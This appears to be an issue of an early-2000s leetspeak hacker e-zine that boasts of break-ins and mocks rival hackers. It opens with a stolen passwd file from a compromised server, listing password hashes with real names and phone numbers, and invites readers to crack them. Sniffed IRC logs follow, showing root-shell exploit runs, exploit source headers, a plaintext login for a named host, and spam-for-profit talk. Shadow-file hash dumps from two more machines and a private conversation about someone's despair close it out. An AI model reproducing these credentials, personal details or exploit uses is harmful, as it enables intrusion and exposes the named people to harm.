eris:92mjA5hyoxZVk:1083:100::0:0:Lenore D'Mort,,,:/home/eris:/bin/csh
jkuroda:$1$12ErrPaA$VB0Ro4hvlv8To1GMzpB7V.:1084:100::0:0:jk,,,:/home/jkuroda:/bin/csh
weldon:9PxczkV42.kJw:1085:100::0:0:Weldon Dodd,,,:/home/weldon:/bin/csh
justabill:$1$J4UXQ1kH$EjUyYrNsMcaEFSJYVpPyK1:1086:100::0:0:,,,:/home/justabill:/bin/csh
fwf:$1$FHoV3vZt$izkVSdJfscWtUMvm8ifDM1:1087:100::0:0:,,,:/home/fwf:/bin/csh
sharon:45LMkfo83RnYE:1088:100::0:0:,,,:/home/sharon:/bin/csh
jlc:78klFR8P9HG8E:1089:100::0:0:,,,:/home/jlc:/bin/csh
arrawn:75snoytaqtsnY:1090:100::0:0:,,,:/home/arrawn:/bin/csh
malikia:bC2cXH3o6ertI:1091:100::0:0:,,,:/home/malikia:/bin/csh
angel:49eYDHgBHaTVg:1092:100::0:0:,,,:/home/angel:/bin/csh
xs:PgnpiTcRaA9bU:1093:1093::0:0:xs,,,:/home/xs:/bin/sh
jraff:49eYDHgBHaTVg:1094:100::0:0:,,,:/home/jraff:/bin/csh
jdog:21D.6K92cFFLU:1095:1095::0:0:,,,:/home/jdog:/bin/csh
oldwolf:$1$d.a5UDct$adTWC4Syy36xTho0NLnui1:1096:100::0:0:Gerald Tarrant,666 Hell Street,666-6666,go away:/home/oldwolf:/bin/csh
grepcat:$1$7C95rldY$aL4CpEpSgFGfyBohrIyqJ1:1097:1097::0:0:Grep Catt,,,:/home/grepcat:/bin/csh
jeru:$1$TqCo35g5$W8eWSfVrfNesM/jw2Qm0D.:1098:100::0:0:,,,:/home/jeru:/bin/sh
pipe:48Jh1IBOzSR5U:1099:100::0:0:,,,:/home/pipe:/bin/sh
bitrush:4dvmnn.huaAPs:1100:100::0:0::/home/bitrush:/usr/local/bin/bash
pulley:dp6jjJ/I1D5zU:1101:1101::0:0:Eric S Pulley,,,707-579-4157 :/home/pulley:/bin/tcsh
cfrankli:65ldy/VbHMzJ6:1103:1102::0:0:Chris Franklin,,,://home/cfrankli:/bin/csh
rfrankli:41N4z0rR9MGt6:1104:1104::0:0:Roger Franklin,,510 758 2213,510 758 2213:/home/rfrankli:/bin/csh
phon-e:35WInlWg82hcc:1105:1105::0:0:Phon-E,,,:/home/phon-e:/bin/csh
wyatt:$1$AC2b3P6w$AaWk4Y2rU9psBs4U8BnJj0:1110:1110::0:0:Evil Wyatt ,-,-,-:/home/wyatt:/bin/csh
steve:8YLhzPL/EUzek:1111:1110::0:0:Steven Kenshalo,209-578-4990,,:/home/steve:/bin/csh
john:yXtkljoGZywOE:1112:1112::0:0:John Kenshalo,,,:/home/john:/bin/csh
judy:28BCNLXm6cES.:1113:1113::0:0:Judy Kenshalo,,,:/home/judy:/bin/csh
darkange:qm6G/cq7kXsus:1114:1114::0:0:DarkAngel,,,:/home/darkangel:/bin/tcsh
attila:DnBTuFbhRaLiE.O6:1115:1115::0:0:Doug C.,,,:/home/attila:/bin/csh
hpeyerl:$1$geXwlldF$jl3Gj4UiSMsoFLFLGaQht1:1118:1118::0:0:Herb Peyerl:/home/hpeyerl:/usr/local/bin/bash
heathen:46zUKRjT3J/YE:1121:1121::0:0:,,,:/home/heathen:/bin/csh
cassiel:$1$fVb6Fuz7$vWisLFp6CmPbF6XCf/7tf/:1230:1230::0:0:,,,:/home/cassiel:/bin/csh
cardinal:$1$XbOY2TXr$JlRsCmZRTIc1PFnrJZnLM0:1048:100::0:0:,,,:/home/cardinal:/bin/csh
sarah:$1$GqbMwgkl$DaUZHz61Tk8A7DwBc9fjV0:1250:1250::0:0:??,,,:/home/sarah:/bin/csh
seventek:$1$fMdpbBsq$EY.BSS/krN8qf3JMAIxSQ/:1280:1280::0:0:Joeseph Seventek ,,,:/home/seventek:/bin/tcsh
cyber:rJnxNCCFbxPCQ:2001:2001:staff:0:0:Evil Erik:/home/cyber:/bin/tcsh
delux:8kwd1aLJCHs2M:2002:2002::0:0:Evil D. Meriwether,,,:/home/delux:/bin/csh
muir:zkSihoVl8FhOI:2043:2043::0:0:David Muir Sharnoff,,,:/home/muir:/bin/csh
jon:hGufGhBASbpTA:13402:100::0:0:Jon Blow,.,,:/home/jon:/bin/csh
dover:$1$5aio3Gd5$yMu13fhRICWVkch8UWxBK.:30025:100::0:0:dover ,,,:/home/dover:/bin/csh
fas:**40ehucFyFYo8s:32700:84:ftponly:0:0:www.fascinator.net ftp Account:/html/docs/www.fascinator.net/:/sbin/nologin
bagg:IW7YeVtKCTcOw:32701:84:ftponly:0:0:BAGG ftp Account:/html/docs/www.bondage-a-go-go.com/:/sbin/ftponly
berz:**Y9U7OTC9wSSy6:1001:1001::0:0:berz:/home/berz:/bin/csh
default:AxYtQlu/9CwqU:1002:1002::0:0:default:/home/default:/bin/csh
msmith:*:3003:3003::0:0:User &:/home/msmith:/bin/csh
bill:XpysrWb6z9DcE:1006:999::0:0:bill scannell:/home/bill:/bin/csh
ftp:**:14:5::0:0:Anonymous FTP Admin:/html/OLD/ftp/ftp.dis.org/:/nonexistent
enrique:$1$mOjm834d$E8gmd4NP/5//U1qxZIpnP/:1007:1007::0:0:enrique:/home/enrique:/bin/sh
gonzo:$1$iegkZZgG$QUC7.teiWvECEt7XRCoEM.:1014:1014::0:0:gonzo:/home/gonzo:/bin/csh
testuser:**t0EqkM4evoxoM:1028:1028::0:0:testuser:/home/testuser:/bin/csh
xam:Mu9ulQPpyBTKo:1029:1029::0:0:xam:/home/xam:/bin/csh
rds:TIBme4UxWnkcg:1030:1030::0:0:rds:/home/rds:/bin/csh
tom:$1$tZnm9.Tg$Gs25Fgu5vEErUlOVaAOsz0:1032:1032::0:0:tom:/home/tom:/bin/csh
eh:$1$2.OdAQYs$WVofOR3NqIUdY6R.bqNAn/:1040:1040::0:0:eh:/home/eh:/bin/csh
till:$1$9IKa/IOj$vXXp.jTfdsLrjgytheq.x0:1047:998::0:0:till:/home/till:/bin/csh
splice:$1$bJvgdCU0$GHDX4BkW6HfofCRF9J6aM0:1067:997::0:0:splice:/home/splice:/bin/tcsh
xenu:$1$xDTWp6y4$idPRu2tMHbKgA6u11VvDS.:1073:996::0:0:xenu:/home/xenu:/bin/csh
andrew:**RBzXSm72KoYhk:1079:1079::0:0:andrew:/home/andrew:/bin/csh
noise:$1$0YHvkqNW$wjVbvJEGIQXRUxX3JFzvJ.:1102:995::0:0:noise:/home/noise:/bin/sh
bronc:$1$lrWSK2BH$mujKWzTg.LRNYwxfTFlQs1:10000:10000::0:0:bronc:/home/bronc:/bin/sh
pablos:**$1$pCb9IrUe$SCjtCRER5PO7rMKTX/ha91:1106:1106::0:0:pablos:/home/pablos:/bin/csh
wintamute:FRUBRptgXpGpg:1107:1107::0:0:wintamute:/home/wintamute:/bin/sh
humperdink:$1$NZRsskK5$mi4XK5pB1.VECx2taJ2iX1:1108:1108::0:0:humperdink:/home/humperdink:/bin/csh
grrlbot:$1$sSY2Ibyp$EC0FBtBH9gVI6S564nWqT.:1109:1109::0:0:grrlbot:/home/grrlbot:/bin/csh
thalakan:$1$DKx5R.ea$MsJl4/GNgi5w51eqTty7d0:1116:1116::0:0:Jason Spence,,510 656 5690,650 520 5090:/home/thalakan:/usr/local/bin/bash
static:$1$E9pk1gAQ$p66IPgElqCjnrEtMaXOSY1:1117:1117::0:0:static:/home/static:/bin/csh
whysean:$1$oxqLK9HE$7CCyOmVvQX2VV.JhauQwT/:1119:1119::0:0:whysean:/home/whysean:/bin/csh
czarina:$1$jXnU3Wz7$rnmJWvzzVGwUJFICEo8Xm1:1120:1120::0:0:czarina:/home/czarina:/bin/csh
change:$1$SOzCTiLf$EFibZmlj0xhJYeZHKGTkA0:1122:1122::0:0:change:/home/change:/bin/csh

palevsky:$1$22s2swRA$9zQqqXIl1VOMMPKH7gYj/.:1000:1000::0:0:palevsky:/home/palevsky:/bin/csh
surlyone:kEhA0fuZjdi5Y:1012:1012::0:0:surlyone:/home/surlyone:/bin/csh
roamer:$1$7O6h/3S1$Ysr2UKLLcwPQv6EBpryDx1:1013:1013::0:0:roamer:/home/roamer:/bin/csh
arlynne:$1$NfpLjquv$w9RFTxrLsHoSnb1qCgeXr/:1018:1018::0:0:arlynne c:/home/arlynne:/bin/csh
jrh:Nh.QSqonM5tUs:1021:1021::0:0:Josh Howard:/home/jrh:/bin/tcsh
daiv:9UNz54RjRxZQk:1035:1035::0:0:daiv:/home/daiv:/bin/csh
mikes:$1$x4cVbaR.$TYwn3wx4te8.6Nj4bJMvo.:1043:1043::0:0:Mike Seelau:/home/mikes:/bin/csh
wenna:g4VW93DqT6BbY:1077:1077::0:0:wenna:/home/wenna:/bin/csh
error:9Bhrqz4h12RXM:1123:1123::0:0:J.S.:/home/error:/bin/csh
db_cooper:$1$ELEim/so$ZD5VQ/OyGOUpgkSMcOw2S1:1124:1124::0:0:trent:/home/db_cooper:/bin/csh
jeedi:$1$ZoHXRhyG$cOlo8NJ/9VERWs/v/FvWR.:1125:1125::0:0:jeedi:/home/jeedi:/usr/local/bin/bash
cat:z62RrjyYvOEnc:1126:1126::0:0:cat:/home/cat:/bin/csh
auto:VURA1HGnDxTec:1127:1127::0:0:auto:/home/auto:/bin/csh
olivas:$1$hwmR3yk8$M9sPohKEv3mcElvA4ssXR.:1128:1128::0:0:olivas:/home/olivas:/bin/csh
ultraviolate:Y0445fYXblW7c:1129:1129::0:0:ultraviolate:/home/ultraviolate:/bin/csh
papersplease:YktVy0a4bF5MU:6000:6000::0:0:papersplease:/html/docs/www.papersplease.org:/sbin/ftponly
mischa:M54X73ZnJi67k:1130:1130::0:0:mischa scannell:/home/mischa:/bin/csh
william:p01g5A0jARD5s:1131:1131::0:0:william scannell:/home/william:/bin/csh
midnight:V9XSjzD0hAF4M:1132:1132::0:0:talthing:/home/midnight:/bin/csh
evilboi:**$1$B11SBaHy$16TYczGKzv3/yW/zUjGn7/:1133:1133::0:0:evilboi:/home/evilboi:/usr/local/bin/bash
glitch:JBnFBd06o16BA:1134:1134::0:0:marsha:/home/glitch:/bin/csh
darkmas:YczG4FsJCUAPI:1135:1135::0:0:bill:/home/darkmas:/bin/csh
[root@kizmiaz] #

^^^ Cr4ck d3z & c0m3 j01n uz. Th3 f1l3z 0n th1z b0x r0ckz ^^^

th4nkz t0 "the next teso" gr0up (n3tr1c) f0r l3tt1ng uz m0dd1fy th31r w0nd3rful
w4r3z, wh1ch w3 c0uldnt h4v3 0wn3d d1s.0rg w1th0ut! 4ls0 th4nkz t0 dvdman f0r
4ll0w1ng b4ngbr0z b3 a t3stb3d (m0r3 0n th1z l4t3r).


18.txt -~-~-~ h3llm4n c4nt 4dm1n

3y3 w4z th1nk1ng.. w3 sh0uld juzt turn th1z z1n3 1nt0 a r3p0s1t0ry 0f ch4tl0gz.
g00d 1d34 huh? 3y3 g0t k1qb4nn3d fr0m #darknet s0 fuq th3m. h3r3 4r3 s0m3 fr0m
th3 s3lf pr0cl41m3d f0und3r 0f teso..


[MSGS ] [09:25pm] - Kas yup@vw-22606.optusnet.com.au talk us up
[MSGS ] [09:25pm] - Kas yup@vw-22606.optusnet.com.au lol
[SEND_MSG] [09:26pm] - #webdesign hah yeah that was a fun night
[SEND_MSG] [09:27pm] - #webdesign memba the night tho we had 4 chicks and us 2
at my house.. in the spa.. then fucking in like every room in the
house.. that was also a kick ass night.
[SEND_MSG] [09:27pm] - kas i did that
[SEND_MSG] [09:27pm] - kas but wif some1 else
[SEND_MSG] [09:27pm] - #webdesign i have nothing to prove .. no reason to lie
[SEND_MSG] [09:27pm] - #webdesign i just talk facts
[SEND_MSG] [09:28pm] - #webdesign oh lord....

R3M3MB3R TH1S "i just talk facts"


[SEND_MSG] [12:13am] - #webdesign ever herad of a crew called teso ?
[SEND_MSG] [12:15am] - #webdesign www.team-teso.net we release useful tolls

W3? BUHAHAHAHA. L1K3 Y0U C4N FUQN C0D3.


[MSGS ] [11:30pm] - Kerr blogs@vw2737.optusnet.com.au <cfquery
name="qResults" datasource="atessa13dbase" dbname="MEMBERS.DBF"
username="atessa13">
[MSGS ] [11:30pm] - Kerr blogs@vw2737.optusnet.com.au still not working
[SEND_MSG] [11:31pm] - kerr hrmm add password="skyline1"
[SEND_MSG] [11:39pm] - kerr hrmm
[SEND_MSG] [11:39pm] - kerr leme try something


L3T M3 TRY SN1FF1NG Y0UR P4ZZW0RDZ. H4R H4R H4R


[SEND_MSG] [12:02pm] - #web-design hrmm found a bug in the linux kernel
[SEND_MSG] [12:02pm] - #web-design buffer overflow
[SEND_MSG] [12:02pm] - #web-design looks like if you get yourself in enough
groups
[SEND_MSG] [12:02pm] - #web-design you can overflow the task_state() by doing a
cat /proc/$$/status
[SEND_MSG] [12:02pm] - #web-design for (g = 0; g < p->ngroups; g++)

[SEND_MSG] [12:02pm] - #web-design buffer += sprintf(buffer,
"%d ", p->groups[g]);
[SEND_MSG] [12:02pm] - #web-design I cant find the size of the buffer however
[SEND_MSG] [12:02pm] - #web-design but it looks like it passes thru alot of
functions with no bounds checking.

MUZT B3 A BUG.. R U SUR3 Y0U 4RNT L34K1NG S1LV10'Z R3S34RCH??


[SEND_MSG] [11:59pm] - jeeves but it takes time to build up the experience
[SEND_MSG] [11:59pm] - jeeves to learn the tricks
[SEND_MSG] [11:59pm] - jeeves to make the money
[SEND_MSG] [11:59pm] - jeeves cos if u go spamming people
[SEND_MSG] [11:59pm] - jeeves if u dont know what ur doing
[SEND_MSG] [11:59pm] - jeeves u will be shut down
[TimeStamp Tue Mar 18 00:00:00 2003]
[TimeStamp Tue Mar 18 00:00:00 2003]
[SEND_MSG] [12:00am] - jeeves within a day
[SEND_MSG] [12:00am] - jeeves but if u do know whats going on
[SEND_MSG] [12:00am] - jeeves usd$5k a week easy
[SEND_MSG] [12:05am] - jeeves i can vouch for that sorta money too

C4RL SP4MZ.


[SEND_MSG] [09:38pm] - #kas all u need is 1 tcp port
[SEND_MSG] [09:38pm] - #kas all i need
[SEND_MSG] [09:38pm] - #kas nearly done
[SEND_MSG] [09:38pm] - #kas sec
[SEND_MSG] [09:39pm] - #kas root@main:~/.s/enc# ./7350paom
[SEND_MSG] [09:39pm] - #kas Tcpd Remote exploit for Linux 2.2.*, 2.4.* 09/10/02
[SEND_MSG] [09:39pm] - #kas by jduck, thanks to xor, zip, scut and ronin.
[SEND_MSG] [09:39pm] - #kas Enter Password:
[SEND_MSG] [09:39pm] - #kas **************
[SEND_MSG] [09:39pm] - #kas Using Offset: 0x08fc3e
[SEND_MSG] [09:39pm] - #kas EIP: 0x08fdd0c
[SEND_MSG] [09:39pm] - #kas Checking EIP 0x08fdd0a ... failed
[SEND_MSG] [09:39pm] - #kas Checking EIP 0x08fdd0b ... failed
[SEND_MSG] [09:39pm] - #kas Checking EIP 0x08fdd0c ... verified
[SEND_MSG] [09:39pm] - #kas ** Lets see what we can bind(); **
[SEND_MSG] [09:39pm] - #kas Exploiting Host: 203.173.160.36....(OK)
[SEND_MSG] [09:39pm] - #kas Binding shell on port 7350
[SEND_MSG] [09:39pm] - #kas > id
[SEND_MSG] [09:39pm] - #kas uid=0(root) gid=0(root) groups=0(root),1(bin)
[SEND_MSG] [09:39pm] - #kas bingo!
[MSGS ] [09:39pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au fuk
[MSGS ] [09:39pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au GIBME!
[MSGS ] [09:39pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au LOL
[SEND_MSG] [09:40pm] - #kas 1 sec.. checking out stuff
[SEND_MSG] [09:43pm] - #kas hrmm he ran iptables before i could run it on that port
[SEND_MSG] [09:43pm] - #kas take down that firewall again
[SEND_MSG] [09:44pm] - #kas h$ ls
[SEND_MSG] [09:44pm] - #kas 7350reass.tar.gz holygrail.c napalm openssl-fuck.c rsx.c t vmware.zip
[SEND_MSG] [09:44pm] - #kas 840.bind9.c hpkit0.2.tar.gz napalm2.c openssl-too-open-Hool.c snifft.c tank2.c
[SEND_MSG] [09:44pm] - #kas bindtty.c hpux-ftp.c nlock.c p24.bin sqlfuck.tgz telnetd.c
[SEND_MSG] [09:44pm] - #kas frassl.c nainject.c openssl-fuck-new.c rdevx.c sxp.bin tsao.tar
[SEND_MSG] [09:44pm] - #kas $ ./7350reass
[SEND_MSG] [09:44pm] - #kas 7350reass - OpenBSD/FreeBSD/NetBSD remote kernel exploit
[SEND_MSG] [09:44pm] - #kas fragment reassembly numeric overflow + logic fuckup
[SEND_MSG] [09:44pm] - #kas -s & -l (21/04)
[SEND_MSG] [09:44pm] - #kas
[SEND_MSG] [09:44pm] - #kas inferior exploits for this bug rely on 3 values.. we
[SEND_MSG] [09:44pm] - #kas only need the ip_reass delta, but still, patience
[SEND_MSG] [09:44pm] - #kas is required to find this.. this shouldn't be a
[SEND_MSG] [09:44pm] - #kas problem.. you don't need root to run this, as
[SEND_MSG] [09:44pm] - #kas everything can be crafted via setsockopt..
[SEND_MSG] [09:44pm] - #kas
[SEND_MSG] [09:44pm] - #kas mhhh, should get you in.. < 5 minutes..
[SEND_MSG] [09:44pm] - #kas no guarantees though..
[SEND_MSG] [09:44pm] - #kas
[SEND_MSG] [09:44pm] - #kas OpenBSD developers are weenies ;)
[SEND_MSG] [09:44pm] - #kas
[SEND_MSG] [09:44pm] - #kas TESO: 2^32-1 SecurityFocus: 2>>2
[SEND_MSG] [09:44pm] - #kas
[SEND_MSG] [09:44pm] - #kas
[SEND_MSG] [09:44pm] - #kas password:
[SEND_MSG] [09:44pm] - #kas $ head -30 openssl-fuck-new.c
[SEND_MSG] [09:44pm] - #kas /*
[SEND_MSG] [09:44pm] - #kas * openssl-too-open.c - OpenSSL remote apache exploit
[SEND_MSG] [09:44pm] - #kas *
[SEND_MSG] [09:44pm] - #kas * by Solar Eclipse <solareclipse@phreedom.org>
[SEND_MSG] [09:44pm] - #kas *
[SEND_MSG] [09:44pm] - #kas * Compile with: gcc -o openssl-too-open openssl-too-open.c -lcrypto
[SEND_MSG] [09:44pm] - #kas *
[SEND_MSG] [09:44pm] - #kas * Private 0dd code. -keep it so divineint :)
[SEND_MSG] [09:44pm] - #kas *
[SEND_MSG] [09:44pm] - #kas * this kode has one extra target for redhat 7.2 / apache 1.3.22-6
[SEND_MSG] [09:44pm] - #kas *
[SEND_MSG] [09:44pm] - #kas */
[SEND_MSG] [09:44pm] - #kas ya
[SEND_MSG] [09:44pm] - #kas ok
[SEND_MSG] [09:44pm] - #kas how about
[SEND_MSG] [09:44pm] - #kas i show u something
[SEND_MSG] [09:45pm] - #kas 1 sec
[SEND_MSG] [09:45pm] - #kas <-- actually researches his own code
[SEND_MSG] [09:46pm] - tom kas.net.au/OpenSSH_3.5p1.txt
[SEND_MSG] [09:46pm] - tom want the exploit for that ?
[SEND_MSG] [09:46pm] - drewgon kas.net.au/OpenSSH_3.5p1.txt
[SEND_MSG] [09:46pm] - drewgon want the exploit for that ?
[SEND_MSG] [09:46pm] - drewgon hehe
[MSGS ] [09:46pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au yep
[MSGS ] [09:46pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au mm
[MSGS ] [09:46pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au i want openssl root.
[MSGS ] [09:46pm] - drewgon bah@dialup-21.179.220.203.acc01-rowa-wan.comindico.com.au lol
[NOTICES ] [09:46pm] - tom no thanks :P
[SEND_MSG] [09:47pm] - tom take a look down the bottom
[NOTICES ] [09:48pm] - tom so?
[SEND_MSG] [09:48pm] - tom not just a script kiddie from packet storm
[NOTICES ] [09:48pm] - tom err
[NOTICES ] [09:49pm] - tom i dont see the relevance mate :)
[NOTICES ] [09:49pm] - tom im not assuming youre a script kiddie

GR34T3ZT L0G 3V3R. D0NT Y0U D4R3 L34K THE REM0T3 *BSD K3RN3L 0D4Y!!!!
TH1Z MUZT B3 WHY Y0U H4V3 T0 C4RD 4LL Y0UR SH3LL 4CC0UNTZ 0N FBSD B0X3Z & RUN IOSMASH, R1GHT??


[SEND_MSG] [05:28pm] - darkacid` <Kwahraw> <darkacid> i fill sorry for people like cam
[SEND_MSG] [05:28pm] - darkacid` <Kwahraw> so, cam is our leak?
[SEND_MSG] [05:28pm] - darkacid` <Zardoz> is he?
[MSGS ] [05:28pm] - darkacid` marijuana@1.800.p1mpdaddy.com LOL
[MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com should i say know cam is not our leak?
[SEND_MSG] [05:29pm] - darkacid` dont say anything
[MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com ok
[SEND_MSG] [05:29pm] - darkacid` they know something is leaking though
[SEND_MSG] [05:29pm] - darkacid` dont proveke the subject
[MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com yeh
[MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com kk
[MSGS ] [05:29pm] - darkacid` marijuana@1.800.p1mpdaddy.com they think icer is sniffing em
[MSGS ] [05:30pm] - darkacid` marijuana@1.800.p1mpdaddy.com are those root's ssh ?
[MSGS ] [05:31pm] - darkacid` marijuana@1.800.p1mpdaddy.com petermc:wyei$7@petermc.lbl.gov
[MSGS ] [05:31pm] - darkacid` marijuana@1.800.p1mpdaddy.com works
[MSGS ] [05:31pm] - darkacid` marijuana@1.800.p1mpdaddy.com ;PP
[MSGS ] [05:32pm] - darkacid` marijuana@1.800.p1mpdaddy.com lol
[MSGS ] [05:32pm] - darkacid` marijuana@1.800.p1mpdaddy.com god man
[MSGS ] [05:32pm] - darkacid` marijuana@1.800.p1mpdaddy.com inever know you knew shit like this
[MSGS ] [05:32pm] - darkacid` marijuana@1.800.p1mpdaddy.com ;P
[SEND_MSG] [05:32pm] - darkacid` as i said
[SEND_MSG] [05:32pm] - darkacid` i know more than i lead on to know
[SEND_MSG] [05:32pm] - darkacid` dont mess with me

BULLSH1T. H0NO W1LL FUQN H4Q Y0U 4G41N Y0U SP4MM1NG B1TCH! Y0U H4V3 N0 FUQN S3CUR1TY. Y0U 4R3 FUQN SCUM.
G0 C4RD S0M3M0R3 SH3LLZ S0 Y0U C4N H4CK Y0U FUQN N0 T4L3NT P13C3 0F D0GSH1T.


[SEND_MSG] [11:38am] - harq .
[NOTICES ] [11:38am] - harq DCC Send fahrenheit.tgz (81.86.236.41)
[MSGS ] [11:38am] - harq harq@dope.illhiphop.org <3 drag'n'drop

HARQ <3 SP4M. HARQ <3 T0 G3T 0WN3D T00?


[MSGS ] [02:57am] - fearsom ~fearsom@67.19.256.256 dood
[MSGS ] [02:57am] - fearsom ~fearsom@67.19.256.256
pd@race4:/eggdrop/scripts$ ssh eu.kas.net.au -lthebug
[MSGS ] [02:57am] - fearsom ~fearsom@67.19.256.256 thats in my history
[MSGS ] [02:57am] - fearsom ~fearsom@67.19.256.256 on my shell

H0NO FUQZ UP!!!


[MSGS ] [04:14am] - fearsom ~fearsom@67.19.256.256 81.91.65.208
[MSGS ] [04:14am] - fearsom ~fearsom@67.19.256.256 is the ip
[MSGS ] [04:14am] - fearsom ~fearsom@67.19.256.256 they used to connect
[MSGS ] [04:14am] - fearsom ~fearsom@67.19.256.256 .fr ip
[MSGS ] [04:24am] - fearsom ~fearsom@67.19.256.256 fuck me
[MSGS ] [04:24am] - fearsom ~fearsom@67.19.256.256 just found another box
with it
[MSGS ] [04:24am] - fearsom ~fearsom@67.19.256.256 \;

[MSGS ] [04:52am] - fearsom ~fearsom@67.19.256.256 from your box
[MSGS ] [04:52am] - fearsom ~fearsom@67.19.256.256 yesterday
[MSGS ] [04:52am] - fearsom ~fearsom@67.19.256.256 i know that wasnt me
[NOTICES ] [07:20am] - fearsom plz notice the topic as site is down atm

PLZ N0T1C3 Y0UR B0X3Z W3R3 RM'D


3Y3'LL S4V3 Y0U TH3 3MB4R4ZZM3NT C4RL.. & 0NLY P0ST TH3Z3 2 SH4D0WZ F0R N0W.
(W3 R JUZT T00 L4ZY T0 G0 THR0UGH TH3 QU4RT3R G1G 0F H4QL0GZ W3 G0T 0N Y0U).


eu.kas.net.au
root:$1$ujo0InKC$a6nh4tysOkTN6Ft2GfaVV.:12740:0:99999:7:::
carl:$1$ZWEqzaIw$7nW/k9Evso9V1ZOD8DodK1:12732:0:99999:7:::
cactiuser:$1$qvCBjir9$DNW2HGjb/WnqHGhZ/2Vty1:12733:0:99999:7:::
pd:$1$LkLGEb6t$JFjab9MxSUq0ANtFUguVY0:12759:0:99999:7:::
thebug:$1$C6iAxjB7$3up7FymevwxI0MVZmUL23.:12744:0:99999:7:::
hellman:$1$x58ZXTf0$MoUdNZRWqH7M9XLuKMuvZ.:12744:0:99999:7:::
jizonu:$1$3w6k0JV1$71O0YT89s3dw.nkc7vMYK1:12745:0:99999:7:::
dns:$1$iSUa3Kf/$tL4ODD03JnLh68sgv.LRi/:12768:0:99999:7:::

kas07.kas.net.au
root:$1$72ATKfWX$fwi7MA8.DViY9r6Nxugrd0:12493:0:99999:7:::
hellman:$1$u/UKeSgu$1vqSVsW/mxhJTCskiAU8g1:12493:0:99999:7:::
pd:$1$pXIVIeEp$l0YLB/xrvmhkJZCKo9AW//:12736:0:99999:7:::
f:$1$2c71DTUx$0yfpCbGFq1Yb539LzS2X8.:12499:0:99999:7:::
bob:$1$qlqICTTj$iIwWYyS1.8yenY.UHbXUj1:12574:0:99999:7:::
harq:$1$9onG2xj8$8QboUVUAKFE.wFuapjHso/:12607:0:99999:7:::
dark:$1$SH7H8OtF$Uu9Hr5vNoj2F8rDq/6S0/0:12690:0:99999:7:::


silvio, harq, bobdash, the_bug, pd... th1z tru3ly 1z a h4q3r h43v3n!
3nt3r th3 l34gu3 0f th3 .au sp4mm3rz!


19.txt -~-~-~ ptp un3th1c4l h4ck1ng

TH1Z 1Z FR0M TH3 H3LLM4N CH4TL0GZ.. 1T SH0ULD G0 1N TH0Z3, BUT W3 SUQ @ M4K1NG 4 ZIN3. M0R3
CH4TL0GZ, C4UZ3 3V3R0N3 L1K3Z T0 R34D TH3M S0 FUQ1NG MUCH... & ALL H0NO KN0WZ H0W T0 D0 1Z SN1FF
IRC TR4FF1C. M4YB3 N3XT Y34R W3 W1LL G3T S0M3 M0R3 0D4YZ.

[MSGS ] [10:42pm] - arcanum arc@mall.pulltheplug.com i simply dont have the connections or money i need to do business shit
[MSGS ] [10:42pm] - arcanum arc@mall.pulltheplug.com i pretty much gave up on trying
[SEND_MSG] [10:42pm] - arcanum what about applying for a job ?
[MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com now i'm just sitting here waiting to goto jail or die
[MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com yea i've been looking for work
[SEND_MSG] [10:43pm] - arcanum any work ? or just selective work ?
[MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com had a few interviews that "looked promising"
[MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com but ended up just flopping
[MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com no work at all
[SEND_MSG] [10:43pm] - arcanum maybe you need to compromise in the sorts of work you are applying for ?
[MSGS ] [10:43pm] - arcanum arc@mall.pulltheplug.com yea
[SEND_MSG] [10:43pm] - arcanum while you have a shit job
[MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com i guess i could go work a burger king or mc donalds
[SEND_MSG] [10:44pm] - arcanum that pays something (something > nothing)
[SEND_MSG] [10:44pm] - arcanum you can still apply for something better
[SEND_MSG] [10:44pm] - arcanum in the mean time
[SEND_MSG] [10:44pm] - arcanum while you work a shit job
[SEND_MSG] [10:44pm] - arcanum and if you get a better job
[SEND_MSG] [10:44pm] - arcanum then you can quit the shit job easy as pie
[SEND_MSG] [10:44pm] - arcanum makes sense..
[SEND_MSG] [10:44pm] - arcanum then you'll have more $ than you currently have
[MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com shrug
[MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com i pretty much lost all motivation
[SEND_MSG] [10:44pm] - arcanum you'll have something to keep your mind busy on other than irc
[MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com to do anything
[MSGS ] [10:44pm] - arcanum arc@mall.pulltheplug.com heh
[SEND_MSG] [10:44pm] - arcanum which kinda degrades the mind for motivation on other shit and what not
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com i rarely irc
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com heh
[SEND_MSG] [10:45pm] - arcanum would you rather work at say burger king making $x/hr or making wargame servers for people you dont know ?
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com i just idle on irc
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com i'm usually doing other things
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com programming little, reverse engineering, playing games, watching movies
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com just
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com nothing PRODUCTIVE
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com i miss being productive
[MSGS ] [10:45pm] - arcanum arc@mall.pulltheplug.com heh
[SEND_MSG] [10:46pm] - arcanum whos court is the ball in ?
[MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com what do you mean?
[MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com i feel like i lost control
[MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com heh
[MSGS ] [10:46pm] - arcanum arc@mall.pulltheplug.com i dont have any control over my future
